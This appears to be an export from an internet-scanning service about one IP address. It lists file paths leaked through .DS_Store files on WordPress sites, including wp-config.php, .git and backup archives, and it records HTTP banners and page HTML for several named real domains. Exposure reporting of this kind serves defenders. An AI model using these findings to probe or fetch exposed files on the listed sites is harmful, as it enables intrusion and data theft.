Found 10 files trough .DS_Store spidering: /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields-pro /wp-content/plugins/ithemes-security-pro /wp-content/uploads /wp-content/uploads/2016 /wp-content/uploads/2016/08 /wp-content/uploads/2016/12 /wp-content/uploads/2017 /wp-content/uploads/2018
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e9f8ddd3d1908d285cf5a50e7805eb9d87
Found 5 files trough .DS_Store spidering: /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields-pro /wp-content/plugins/ithemes-security-pro /wp-content/uploads
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c7c3d3e457c3d3e455648281e34e81815533d7b507e4f8260
Found 30 files trough .DS_Store spidering: /.git /.gitignore /.htaccess /azuredeploy.json /hostingstart.html /index.php /license.txt /license2.txt /readme.html /readme.md /web.config /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /wwwroot.tar /xmlrpc.php /xmlrpc.php.off
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: high
Fingerprint: 5f32cf5d6962f09c99d3320899d3320853909cde3c23e24f560d2574d1d5913f
Found 44 files trough .DS_Store spidering: /.DS_Store /.htaccess /index.php /license.txt /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-content/.DS_Store /wp-content/index.php /wp-content/languages /wp-content/plugins /wp-content/plugins/.DS_Store /wp-content/plugins/advanced-custom-fields-pro /wp-content/plugins/advanced-custom-fields-pro (2).zip /wp-content/plugins/akismet /wp-content/plugins/hello.php /wp-content/plugins/index.php /wp-content/plugins/Policy_Updater-master-e054e0fc71c7339d75a2bce27fcd702f2c3ce5eb /wp-content/plugins/shortcode-in-menus /wp-content/plugins/toolbar-publish-button /wp-content/plugins/wordpress-importer /wp-content/plugins/WP-D3-Instagram-master-eac0c9849fecfcd0fcaeb40d35bb30a596d3425a /wp-content/plugins/wp-fail2ban /wp-content/plugins/wp-migrate-db-pro /wp-content/plugins/wp-migrate-db-pro-1.5.5.zip /wp-content/plugins/wp-migrate-db-pro-media-files /wp-content/plugins/wp-migrate-db-pro-media-files-1.4.3.zip /wp-content/themes /wp-content/upgrade /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: high
Fingerprint: 5f32cf5d6962f09c248e4f81248e4f8138c97a7cf87c7aeb74234871725f9307
Found 41 files trough .DS_Store spidering: /.htaccess /index.php /license.txt /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-content/index.php /wp-content/plugins /wp-content/plugins/advanced-custom-fields-pro /wp-content/plugins/advanced-custom-fields-pro (2).zip /wp-content/plugins/contact-form-7 /wp-content/plugins/index.php /wp-content/plugins/Policy_Updater-master-e054e0fc71c7339d75a2bce27fcd702f2c3ce5eb /wp-content/plugins/shortcode-in-menus /wp-content/plugins/toolbar-publish-button /wp-content/plugins/WP-D3-Instagram-master-eac0c9849fecfcd0fcaeb40d35bb30a596d3425a /wp-content/plugins/wp-fail2ban /wp-content/plugins/wp-migrate-db-pro /wp-content/plugins/wp-migrate-db-pro-1.5.5.zip /wp-content/plugins/wp-migrate-db-pro-media-files /wp-content/plugins/wp-migrate-db-pro-media-files-1.4.3.zip /wp-content/themes /wp-content/themes/.DS_Store /wp-content/themes/index.php /wp-content/themes/iron-restaurant /wp-content/upgrade /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Open service 23.36.162.70:443 · emp-retaildemousa-uss4.draftkingstest.com
2026-01-09 23:31
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: W/"1dbebf56e715d7f"
Last-Modified: Thu, 03 Jul 2025 08:35:29 GMT
Access-Control-Allow-Origin: *
X-Akamai-Transformed: 9 510 0 pmb=mRUM,1
Expires: Fri, 09 Jan 2026 23:31:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Jan 2026 23:31:41 GMT
Content-Length: 5296
Connection: close
Set-Cookie: GCLB=CLO1nMKr9r7CvQEQAw; path=/; HttpOnly; expires=Fri, 09-Jan-2026 23:36:41 GMT
Server-Timing: cdn-cache; desc=MISS
Server-Timing: edge; dur=391
Server-Timing: origin; dur=23
Server-Timing: ak_p; desc="1768001500660_388276245_2987082092_41323_9946_99_244_-";dur=1
Page title: Retail.EMP
<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons"/><link rel="shortcut icon" href="/img/favicon.ico"><link rel="icon" type="image/png" sizes="32x32" href="/img/favicon-32x32.png"><link rel="icon" type="image/png" sizes="192x192" href="/img/android-chrome-192x192.png"><link rel="icon" type="image/png" sizes="512x512" href="/img/android-chrome-512x512.png"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><title>Retail.EMP</title>
<script>!function(e){var n="https://s.go-mpulse.net/boomerang/";if("False"=="True")e.BOOMR_config=e.BOOMR_config||{},e.BOOMR_config.PageParams=e.BOOMR_config.PageParams||{},e.BOOMR_config.PageParams.pci=!0,n="https://s2.go-mpulse.net/boomerang/";if(window.BOOMR_API_key="JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM",function(){function e(){if(!r){var e=document.createElement("script");e.id="boomr-scr-as",e.src=window.BOOMR.url,e.async=!0,o.appendChild(e),r=!0}}function t(e){r=!0;var n,t,a,i,d=document,O=window;if(window.BOOMR.snippetMethod=e?"if":"i",t=function(e,n){var t=d.createElement("script");t.id=n||"boomr-if-as",t.src=window.BOOMR.url,BOOMR_lstart=(new Date).getTime(),e=e||d.body,e.appendChild(t)},!window.addEventListener&&window.attachEvent&&navigator.userAgent.match(/MSIE [67]\./))return window.BOOMR.snippetMethod="s",void t(o,"boomr-async");a=document.createElement("IFRAME"),a.src="about:blank",a.title="",a.role="presentation",a.loading="eager",i=(a.frameElement||a).style,i.width=0,i.height=0,i.border=0,i.display="none",o.appendChild(a);try{O=a.contentWindow,d=O.document.open()}catch(_){n=document.domain,a.src="javascript:var d=document.open();d.domain='"+n+"';void 0;",O=a.contentWindow,d=O.document.open()}if(n)d._boomrl=function(){this.domain=n,t()},d.write("<bo"+"dy onload='document._boomrl();'>");else if(O._boomrl=function(){t()},O.addEventListener)O.addEventListener("load",O._boomrl,!1);else if(O.attachEvent)O.attachEvent("onload",O._boomrl);d.close()}function a(e){window.BOOMR_onload=e&&e.timeStamp||(new Date).getTime()}if(!window.BOOMR||!window.BOOMR.version&&!window.BOOMR.snippetExecuted){window.BOOMR=window.BOOMR||{},window.BOOMR.snippetStart=(new Date).getTime(),window.BOOMR.snippetExecuted=!0,window.BOOMR.snippetVersion=14,window.BOOMR.url=n+"JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM";var i=document.currentScript||document.getElementsByTagName("script")[0],o=i.parentNode,r=!1,d=document.createElement("link");if(d.relList&&"function"==typeof d.relList.supports&&d.relList.supports("preload")&&"as"in d)window.BOOMR.snippetMethod="p",d.href=window.BOOMR.url,d.rel="preload",d.as="script",d.addEventListener("load",e),d.addEventListener("error",function(){t(!0)}),setTimeout(function(){if(!r)t(!0)},3e3),BOOMR_lstart=(new Date).getTime(),o.appendChild(d);else t(!1);if(window.addEventListener)window.addEventListener("load",a,!1);else if(window.attachEvent)window.attachEvent("onload",a)}}(),"".length>0)if(e&&"performance"in e&&e.performance&&"function"==typeof e.performance.setResourceTimingBufferSize)e.performance.setResourceTimingBufferSize();!function(){if(BOOMR=e.BOOMR||{},BOOMR.plugins=BOOMR.plugins||{},!BOOMR.plugins.AK){var n=""=="true"?1:0,t="",a="so3jksyxesrem2lbr7oa-f-80fa7e724-clientnsv4-s.akamaihd.net",i="false"=="true"?2:1,o={"ak.v":"39","ak.cp":"1286861","ak.ai":parseInt("983061",10),"ak.ol":"0","ak.cr":99,"ak.ipv":4,"ak.proto":"http/1.1","ak.rid":"b20b416c","ak.r":40717,"ak.a2":n,"ak.m":"","ak.n":"essl","ak.bpcip":"147.182.149.0","ak.cport":33610,"ak.gh":"23.36.160.21","ak.quicv":"","ak.tlsv":"tls1.3","ak.0rtt":"","ak.0rtt.ed":"","ak.csrc":"-","ak.acc":"bbr","ak.t":"1768001500","ak.ak":"hOBiQwZUYzCg5VSAfCLimQ==WfQ8FHgKt+oIrMzXnEHvd741160KkMpyY2XRlxzPi+kRNOh+DdtdhxSJ54UjwKx9oV2kApsSVdqJGDWalcuMjsNypZuIYupHmHjw40sdkMa9LWwbzrrfI6Hk4HcTMIW3rVZw
Open service 23.36.162.70:443 · www.krispykreme.jp
2026-01-09 21:39
HTTP/1.1 301 Moved Permanently X-Redirect-By: WordPress X-Frame-Options: SAMEORIGIN Location: https://krispykreme.jp/ Strict-Transport-Security: max-age=31536000; Access-Control-Allow-Origin: * Content-Security-Policy: default-src * 'self' 'unsafe-eval' 'unsafe-inline' gap://ready file:; style-src 'self' 'unsafe-inline' 'unsafe-eval' *.googleapis.com unpkg.com woobox.com www.google-analytics.com *.typekit.net cdn.jsdelivr.net *.form.run; font-src * 'self' 'unsafe-eval' 'unsafe-inline' data:; connect-src * 'self' *.form.run api.form.run; object-src 'self' 'unsafe-eval' 'unsafe-inline'; child-src 'self' youtube.com woobox.com www.google-analytics.com *.youtube.com www.google.com *.form.run; frame-src * 'self' 'unsafe-eval' 'unsafe-inline' youtube.com woobox.com www.google-analytics.com *.youtube.com *.form.run; script-src * 'self' 'unsafe-eval' 'unsafe-inline' maps.googleapis.com www.google.com www.google-analytics.com unpkg.com woobox.com *.form.run sdk.form.run; media-src * 'self' 'unsafe-eval' 'unsafe-inline'; img-src * 'self' filesystem: data: blob: *.form.run; Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Fri, 09 Jan 2026 21:39:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Jan 2026 21:39:31 GMT Connection: close Set-Cookie: mw-wp-form-token=0859b1f4bf3d2ecdc4924768be645a154d9876226cadd6e0d440307434c2abc6; path=/; secure; HttpOnly Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=251 Server-Timing: origin; dur=591 Alt-Svc: h3=":443"; ma=93600 Server-Timing: ak_p; desc="1767994770297_388276244_3494569556_84235_13586_1_32_-";dur=1
Open service 23.36.162.70:443 · emp-retailexhibitionusa-uss1.draftkingstest.com
2026-01-09 19:59
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: W/"1dc6d9be98d9561"
Last-Modified: Mon, 15 Dec 2025 08:22:12 GMT
Access-Control-Allow-Origin: *
X-Akamai-Transformed: 9 668 0 pmb=mRUM,1
Expires: Fri, 09 Jan 2026 19:59:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Jan 2026 19:59:32 GMT
Content-Length: 6160
Connection: close
Set-Cookie: GCLB=CPnyibi2g6iJRxAD; path=/; HttpOnly; expires=Fri, 09-Jan-2026 20:04:32 GMT
Server-Timing: cdn-cache; desc=MISS
Server-Timing: edge; dur=438
Server-Timing: origin; dur=36
Server-Timing: ak_p; desc="1767988771988_388276245_2967834682_47429_59062_0_160_-";dur=1
Page title: Retail.EMP
<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="dns-prefetch" href="//fonts.googleapis.com"><link rel="dns-prefetch" href="//fonts.gstatic.com"><link rel="preconnect" href="https://fonts.googleapis.com"/><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin/><link rel="preload" href="/settings" as="script"/><link rel="preload" href="/img/logo.png" as="image"/><link rel="preload" href="/img/logo.svg" as="image"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap" media="print" onload="this.media='all'"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons&display=swap" media="print" onload="this.media='all'"/><noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons&display=swap"/></noscript><link rel="shortcut icon" href="/img/favicon.ico"><link rel="icon" type="image/png" sizes="32x32" href="/img/favicon-32x32.png"><link rel="icon" type="image/png" sizes="192x192" href="/img/android-chrome-192x192.png"><link rel="icon" type="image/png" sizes="512x512" href="/img/android-chrome-512x512.png"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><title>Retail.EMP</title><script defer="defer" src="/runtime.b3cea4bbe07d177bd7a1.js"></script><script defer="defer" src="/vendors.b3cea4bbe07d177bd7a1.js"></script><script defer="defer" src="/main.b3cea4bbe07d177bd7a1.js"></script>
<script>!function(e){var n="https://s.go-mpulse.net/boomerang/";if("False"=="True")e.BOOMR_config=e.BOOMR_config||{},e.BOOMR_config.PageParams=e.BOOMR_config.PageParams||{},e.BOOMR_config.PageParams.pci=!0,n="https://s2.go-mpulse.net/boomerang/";if(window.BOOMR_API_key="JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM",function(){function e(){if(!r){var e=document.createElement("script");e.id="boomr-scr-as",e.src=window.BOOMR.url,e.async=!0,o.appendChild(e),r=!0}}function t(e){r=!0;var n,t,a,i,d=document,O=window;if(window.BOOMR.snippetMethod=e?"if":"i",t=function(e,n){var t=d.createElement("script");t.id=n||"boomr-if-as",t.src=window.BOOMR.url,BOOMR_lstart=(new Date).getTime(),e=e||d.body,e.appendChild(t)},!window.addEventListener&&window.attachEvent&&navigator.userAgent.match(/MSIE [67]\./))return window.BOOMR.snippetMethod="s",void t(o,"boomr-async");a=document.createElement("IFRAME"),a.src="about:blank",a.title="",a.role="presentation",a.loading="eager",i=(a.frameElement||a).style,i.width=0,i.height=0,i.border=0,i.display="none",o.appendChild(a);try{O=a.contentWindow,d=O.document.open()}catch(_){n=document.domain,a.src="javascript:var d=document.open();d.domain='"+n+"';void 0;",O=a.contentWindow,d=O.document.open()}if(n)d._boomrl=function(){this.domain=n,t()},d.write("<bo"+"dy onload='document._boomrl();'>");else if(O._boomrl=function(){t()},O.addEventListener)O.addEventListener("load",O._boomrl,!1);else if(O.attachEvent)O.attachEvent("onload",O._boomrl);d.close()}function a(e){window.BOOMR_onload=e&&e.timeStamp||(new Date).getTime()}if(!window.BOOMR||!window.BOOMR.version&&!window.BOOMR.snippetExecuted){window.BOOMR=window.BOOMR||{},window.BOOMR.snippetStart=(new Date).getTime(),window.BOOMR.snippetExecuted=!0,window.BOOMR.snippetVersion=14,window.BOOMR.url=n+"JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM";var i=document.currentScript||document.getElementsByTagName("script")[0],o=i.parentNode,r=!1,d=document.createElement("link");if(d.relList&&"function"==typeof d.relList.supports&&d.relList.supports("preload")&&"as"in d)window.BOOMR.snippetMethod="p",d.href=window.BOOMR.url,d.rel="preload",d.as="script",d.addEventListener("load",e),d.addEventListener("error",function(){t(!0)}),setTimeout(function(){if(!r)t(!0)},3e3),BOOMR_lstart=(new Date).getTime(),o.appendChild(d);else t(!1);if(window.addEventListener)window.addEventListener("load",a,!1);else if(window.attachEv
Open service 23.36.162.70:443 · emp-retaildemousa-uss1.draftkingstest.com
2026-01-09 05:13
HTTP/1.1 403 Forbidden Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 403 Expires: Fri, 09 Jan 2026 05:13:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Jan 2026 05:13:22 GMT Connection: close Server-Timing: cdn-cache; desc=HIT Server-Timing: edge; dur=1 Server-Timing: ak_p; desc="1767935602594_388276245_2900865663_21_10941_155_348_-";dur=1 Page title: Access Denied <HTML><HEAD> <TITLE>Access Denied</TITLE> </HEAD><BODY> <H1>Access Denied</H1> You don't have permission to access "http://emp-retaildemousa-uss1.draftkingstest.com/" on this server.<P> Reference #18.15a02417.1767935602.ace7b27f <P>https://errors.edgesuite.net/18.15a02417.1767935602.ace7b27f</P> </BODY> </HTML>
Open service 23.36.162.70:443 · www.medplusmart.com
2026-01-09 01:25
HTTP/1.1 403 Forbidden Server: Apache Content-Security-Policy: frame-ancestors https://www.medplusindia.com; Feature-Policy: fullscreen 'none'; microphone 'none' X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains Referrer-Policy: same-origin Content-Type: text/html; charset=iso-8859-1 X-Akamai-Transformed: 0 - 0 - Date: Fri, 09 Jan 2026 01:25:09 GMT Connection: close Set-Cookie: _abck=396BE65164E8E21F2CEFCF8F8D1B96FF~-1~YAAQBqAkF7waUSabAQAAe39boA+XXHGYwJz6BONHMpKf4Etce1X00WiJCqBE2N9j01duPLW7uFRIet2wOrtlVW6MsT4XM1znzOFLA3MmGGihBWW56rl72m0IMVAJkMGnMXZHgnKo9cZv7pm5n3X9RPHKoVxE87RY8JvLx2zoSDiFT/obfYNyC1lfqmxDnhNBsMkHgDWkswhViHj9Rdw3BOo0Cg5MS9ziJaeeEiz8I/b4ZVqHVo6t5PlKDDxP7ssO1M9KIWeZRnO0BNbO2f2nNNXeAcIJWF0GV1TwqrrMxZDfS5NWEW0MmHlAFfHG7DOUyeh7ET58FVnMfQsP33bcJ9tuch9U9Pc/aQlX/Rf29oxkGSWLBoZgdhoJ6wge5Thx6N8yIGIk48VJQSU1Ngw4PAfokjdQK0cy2QlnGly8I6Xy8baNVKiyZNwtEBUkYnCgv5G1zO5Hr4WEGg==~-1~-1~-1~-1~-1; Domain=.medplusmart.com; Path=/; Expires=Sat, 09 Jan 2027 01:25:09 GMT; Max-Age=31536000; Secure Set-Cookie: bm_sz=345E860DEB2E579F864A7E1E5C24FCC3~YAAQBqAkF70aUSabAQAAe39boB4qKDnC0RHDc+9nKzpT9tnGve/zZN5LS0t9tSRSMeRmSS2xIcd1s/RlB1lREkY1wvIM9bpkjktrvtIJXIeD+1F/13D8P4l6/Ujugydm8vqczwfLsrQ4DKUn3XteKYJNozyQ/tTJ2AXLI5Xk6O3Vnks2AFR4Xs7dDR3rXkg8D/Xs8beIuT01kVybSxl7PsfjcR+OP8QdjABWrXtmWoDcpT5UJin0P6shWbyaeO2taT2Z0QrYf+j3FrlWW2ShOMteWcYU2FtWfbQMT0p8YOjpS7IPgAusa9acSuhfuXG+JmPiMy//82w6amzgORkoPCKHPOyj6qf7dvA6Zoi9UiVspz4=~3753267~4539458; Domain=.medplusmart.com; Path=/; Expires=Fri, 09 Jan 2026 05:25:09 GMT; Max-Age=14400 Page title: 403 Forbidden <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access this resource.</p> <script type="text/javascript" nonce="ab42a400c7464ad605c2ceafce4ad4b4" src="/nbtM1M/eUG/wGS/9H2uXw/Yrai2SGSrJVwNS3pJu/XEcFAQ/Bn5H/N2YzFkkB"></script></body></html>
Open service 23.36.162.70:443 · emp-retailexhibitionusa-uss1.draftkingstest.com
2026-01-02 21:54
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: W/"1dc6d9be98d9561"
Last-Modified: Mon, 15 Dec 2025 08:22:12 GMT
Access-Control-Allow-Origin: *
X-Akamai-Transformed: 9 668 0 pmb=mRUM,1
Expires: Fri, 02 Jan 2026 21:54:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 02 Jan 2026 21:54:47 GMT
Content-Length: 6162
Connection: close
Set-Cookie: GCLB=CN6Z-aGzx9GvvAEQAw; path=/; HttpOnly; expires=Fri, 02-Jan-2026 21:59:46 GMT
Server-Timing: cdn-cache; desc=MISS
Server-Timing: edge; dur=176
Server-Timing: origin; dur=30
Server-Timing: ak_p; desc="1767390886511_388276230_2199593969_20619_8080_150_323_-";dur=1
Page title: Retail.EMP
<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="dns-prefetch" href="//fonts.googleapis.com"><link rel="dns-prefetch" href="//fonts.gstatic.com"><link rel="preconnect" href="https://fonts.googleapis.com"/><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin/><link rel="preload" href="/settings" as="script"/><link rel="preload" href="/img/logo.png" as="image"/><link rel="preload" href="/img/logo.svg" as="image"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap" media="print" onload="this.media='all'"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons&display=swap" media="print" onload="this.media='all'"/><noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons&display=swap"/></noscript><link rel="shortcut icon" href="/img/favicon.ico"><link rel="icon" type="image/png" sizes="32x32" href="/img/favicon-32x32.png"><link rel="icon" type="image/png" sizes="192x192" href="/img/android-chrome-192x192.png"><link rel="icon" type="image/png" sizes="512x512" href="/img/android-chrome-512x512.png"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><title>Retail.EMP</title><script defer="defer" src="/runtime.b3cea4bbe07d177bd7a1.js"></script><script defer="defer" src="/vendors.b3cea4bbe07d177bd7a1.js"></script><script defer="defer" src="/main.b3cea4bbe07d177bd7a1.js"></script>
<script>!function(e){var n="https://s.go-mpulse.net/boomerang/";if("False"=="True")e.BOOMR_config=e.BOOMR_config||{},e.BOOMR_config.PageParams=e.BOOMR_config.PageParams||{},e.BOOMR_config.PageParams.pci=!0,n="https://s2.go-mpulse.net/boomerang/";if(window.BOOMR_API_key="JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM",function(){function e(){if(!r){var e=document.createElement("script");e.id="boomr-scr-as",e.src=window.BOOMR.url,e.async=!0,o.appendChild(e),r=!0}}function t(e){r=!0;var n,t,a,i,d=document,O=window;if(window.BOOMR.snippetMethod=e?"if":"i",t=function(e,n){var t=d.createElement("script");t.id=n||"boomr-if-as",t.src=window.BOOMR.url,BOOMR_lstart=(new Date).getTime(),e=e||d.body,e.appendChild(t)},!window.addEventListener&&window.attachEvent&&navigator.userAgent.match(/MSIE [67]\./))return window.BOOMR.snippetMethod="s",void t(o,"boomr-async");a=document.createElement("IFRAME"),a.src="about:blank",a.title="",a.role="presentation",a.loading="eager",i=(a.frameElement||a).style,i.width=0,i.height=0,i.border=0,i.display="none",o.appendChild(a);try{O=a.contentWindow,d=O.document.open()}catch(_){n=document.domain,a.src="javascript:var d=document.open();d.domain='"+n+"';void 0;",O=a.contentWindow,d=O.document.open()}if(n)d._boomrl=function(){this.domain=n,t()},d.write("<bo"+"dy onload='document._boomrl();'>");else if(O._boomrl=function(){t()},O.addEventListener)O.addEventListener("load",O._boomrl,!1);else if(O.attachEvent)O.attachEvent("onload",O._boomrl);d.close()}function a(e){window.BOOMR_onload=e&&e.timeStamp||(new Date).getTime()}if(!window.BOOMR||!window.BOOMR.version&&!window.BOOMR.snippetExecuted){window.BOOMR=window.BOOMR||{},window.BOOMR.snippetStart=(new Date).getTime(),window.BOOMR.snippetExecuted=!0,window.BOOMR.snippetVersion=14,window.BOOMR.url=n+"JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM";var i=document.currentScript||document.getElementsByTagName("script")[0],o=i.parentNode,r=!1,d=document.createElement("link");if(d.relList&&"function"==typeof d.relList.supports&&d.relList.supports("preload")&&"as"in d)window.BOOMR.snippetMethod="p",d.href=window.BOOMR.url,d.rel="preload",d.as="script",d.addEventListener("load",e),d.addEventListener("error",function(){t(!0)}),setTimeout(function(){if(!r)t(!0)},3e3),BOOMR_lstart=(new Date).getTime(),o.appendChild(d);else t(!1);if(window.addEventListener)window.addEventListener("load",a,!1);else if(window.attachEv
Open service 23.36.162.70:443 · www.krispykreme.jp
2026-01-02 16:51
HTTP/1.1 301 Moved Permanently X-Redirect-By: WordPress X-Frame-Options: SAMEORIGIN Location: https://krispykreme.jp/ Strict-Transport-Security: max-age=31536000; Access-Control-Allow-Origin: * Content-Security-Policy: default-src * 'self' 'unsafe-eval' 'unsafe-inline' gap://ready file:; style-src 'self' 'unsafe-inline' 'unsafe-eval' *.googleapis.com unpkg.com woobox.com www.google-analytics.com *.typekit.net cdn.jsdelivr.net *.form.run; font-src * 'self' 'unsafe-eval' 'unsafe-inline' data:; connect-src * 'self' *.form.run api.form.run; object-src 'self' 'unsafe-eval' 'unsafe-inline'; child-src 'self' youtube.com woobox.com www.google-analytics.com *.youtube.com www.google.com *.form.run; frame-src * 'self' 'unsafe-eval' 'unsafe-inline' youtube.com woobox.com www.google-analytics.com *.youtube.com *.form.run; script-src * 'self' 'unsafe-eval' 'unsafe-inline' maps.googleapis.com www.google.com www.google-analytics.com unpkg.com woobox.com *.form.run sdk.form.run; media-src * 'self' 'unsafe-eval' 'unsafe-inline'; img-src * 'self' filesystem: data: blob: *.form.run; Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Fri, 02 Jan 2026 16:51:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 02 Jan 2026 16:51:26 GMT Connection: close Set-Cookie: mw-wp-form-token=a8d9d86357597434cd615fc119e603ae9ad29479df6aa29d6a42c57055fb6c3e; path=/; secure; HttpOnly Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=711 Server-Timing: origin; dur=610 Alt-Svc: h3=":443"; ma=93600 Server-Timing: ak_p; desc="1767372685576_388276230_2155374056_132061_16942_12_31_-";dur=1
Open service 23.36.162.70:443 · emp-retaildemousa-uss1.draftkingstest.com
2026-01-02 11:59
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: W/"1dc6d9be98d9561"
Last-Modified: Mon, 15 Dec 2025 08:22:12 GMT
Access-Control-Allow-Origin: *
X-Akamai-Transformed: 9 700 0 pmb=mRUM,1
Expires: Fri, 02 Jan 2026 11:59:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 02 Jan 2026 11:59:03 GMT
Content-Length: 6159
Connection: close
Set-Cookie: GCLB=CImMuI6xmob5swEQAw; path=/; HttpOnly; expires=Fri, 02-Jan-2026 12:04:03 GMT
Server-Timing: cdn-cache; desc=MISS
Server-Timing: edge; dur=256
Server-Timing: origin; dur=30
Server-Timing: ak_p; desc="1767355143506_388276230_2115007377_28636_33558_0_125_-";dur=1
Page title: Retail.EMP
<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="dns-prefetch" href="//fonts.googleapis.com"><link rel="dns-prefetch" href="//fonts.gstatic.com"><link rel="preconnect" href="https://fonts.googleapis.com"/><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin/><link rel="preload" href="/settings" as="script"/><link rel="preload" href="/img/logo.png" as="image"/><link rel="preload" href="/img/logo.svg" as="image"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap" media="print" onload="this.media='all'"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons&display=swap" media="print" onload="this.media='all'"/><noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons&display=swap"/></noscript><link rel="shortcut icon" href="/img/favicon.ico"><link rel="icon" type="image/png" sizes="32x32" href="/img/favicon-32x32.png"><link rel="icon" type="image/png" sizes="192x192" href="/img/android-chrome-192x192.png"><link rel="icon" type="image/png" sizes="512x512" href="/img/android-chrome-512x512.png"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><title>Retail.EMP</title><script defer="defer" src="/runtime.b3cea4bbe07d177bd7a1.js"></script><script defer="defer" src="/vendors.b3cea4bbe07d177bd7a1.js"></script><script defer="defer" src="/main.b3cea4bbe07d177bd7a1.js"></script>
